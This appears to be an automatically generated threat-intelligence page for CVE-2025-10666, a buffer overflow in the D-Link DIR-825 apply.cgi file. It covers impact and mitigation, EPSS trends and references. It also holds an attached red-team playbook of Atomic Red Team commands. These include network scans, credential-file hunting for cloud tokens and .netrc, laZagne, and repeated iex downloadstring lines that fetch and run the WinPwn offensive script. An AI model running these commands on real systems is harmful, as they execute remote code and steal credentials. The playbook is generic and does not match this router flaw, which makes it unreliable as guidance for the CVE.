CVE-2025-10666
Overview
This vulnerability is a buffer overflow caused by improper handling of the countdown_time argument within the sub_4106d4 function of the apply.cgi component in D-Link DIR-825 firmware versions up to 2.10. The flaw arises from insufficient bounds checking during input processing, allowing memory corruption. The affected component is the web interface's CGI script responsible for applying configuration changes.
Vulnerability Description
A security flaw has been discovered in D-Link DIR-825 up to 2.10. Affected by this vulnerability is the function sub_4106d4 of the file apply.cgi. The manipulation of the argument countdown_time results in buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be exploited. This vulnerability only affects products that are no longer supported by the maintainer.
Impact
An attacker with network access and low privileges can exploit this buffer overflow remotely without user interaction to execute arbitrary code on the affected device. This can lead to full compromise of the device, including unauthorized control and disruption of network services. The CVSS vector indicates high confidentiality, integrity, and availability impacts (C:H/I:H/A:H), with exploit code publicly available (E:P) and no user interaction required (UI:N).
Solution
Since the affected D-Link DIR-825 firmware versions up to 2.10 are no longer supported by the vendor, no official patches are available. Users are advised to discontinue use of these unsupported devices or isolate them from untrusted networks. For further details, refer to the vulnerability report at https://vuldb.com/?id.324787 for any potential vendor updates or community mitigations.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical security flaw has been identified in the D-Link DIR-825 router, specifically within the function responsible for handling configuration changes. The vulnerability arises from improper handling of the `countdown_time` argument in the `apply.cgi` file, leading to a buffer overflow condition. This flaw allows an attacker to overwrite the memory of the affected device, potentially leading to arbitrary code execution. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating that it poses a significant risk to the confidentiality, integrity, and availability of the affected systems.
Exploitation of this vulnerability can occur remotely, which significantly increases the threat landscape. Attackers can craft specially designed requests that manipulate the `countdown_time` argument to overflow the buffer. Once the overflow is successful, an attacker could execute arbitrary code with the privileges of the web server process, which typically runs with elevated permissions. This could allow the attacker to gain control over the device, alter configurations, or even pivot to other devices on the network. Given that the affected product is no longer supported by the vendor, there are no patches or updates available to mitigate this risk, making it particularly attractive for malicious actors.
The real-world impact of this vulnerability can be profound, especially for organizations that rely on the D-Link DIR-825 for their networking needs. Compromised routers can be used as launching points for further attacks, including man-in-the-middle attacks or as part of a botnet for distributed denial-of-service (DDoS) attacks. Additionally, sensitive data transmitted through the router could be intercepted, leading to data breaches and loss of customer trust. The financial implications of such incidents can be severe, encompassing direct costs associated with incident response, potential regulatory fines, and long-term reputational damage.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular network scans can help identify vulnerable devices still in use, and organizations should maintain an inventory of all networked devices to assess their support status. For those still using the D-Link DIR-825, immediate steps should be taken to isolate the device from critical networks or replace it with a supported alternative. Additionally, implementing network segmentation can limit the potential impact of an exploit, ensuring that even if a device is compromised, the attacker cannot easily access sensitive systems.
In conclusion, the buffer overflow vulnerability in the D-Link DIR-825 presents a serious threat to organizations that have not yet addressed this issue. The potential for remote exploitation combined with the lack of vendor support creates a perfect storm for cybercriminals. Organizations must prioritize the identification and remediation of such vulnerabilities to safeguard their networks and data. By adopting proactive detection and mitigation strategies, businesses can significantly reduce their exposure to this and similar threats in the future.
CSURFACE threat intelligence has detected a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-10666, rising by approximately 14.6%. This upward trend, corroborated by our telemetry showing a steady week-over-week increase, indicates growing attacker interest and potential exploitation attempts targeting the D-Link DIR-825 vulnerability. Although the vulnerability affects unsupported devices, the elevated EPSS percentile suggests that threat actors are increasingly prioritizing this vector, likely due to the availability of public proof-of-concept exploits. This shift elevates the risk profile for organizations still operating affected hardware, as the likelihood of remote buffer overflow attacks causing denial-of-service or further compromise has become more pronounced. Consequently, defenders should recognize that the threat level associated with this vulnerability is intensifying, underscoring the critical need for enhanced monitoring and risk management around legacy network infrastructure.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-825 Firmware | All |
cpe:2.3:o:dlink:dir-825_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS) | Beatriz Fresno Naumova | hardware | multiple | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-10666 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.324787 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.324787 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.652047 |
| github.com |
GitHub CVE
related
|
https://github.com/panda666-888/vuls/blob/main/d-link/dir-825/apply.cgi.md |
| github.com |
GitHub CVE
exploit
|
https://github.com/panda666-888/vuls/blob/main/d-link/dir-825/apply.cgi.md#poc |
| dlink.com |
GitHub CVE
product
|
https://www.dlink.com/ |
| exploit-db.com |
NVD API
|
https://www.exploit-db.com/exploits/52469 |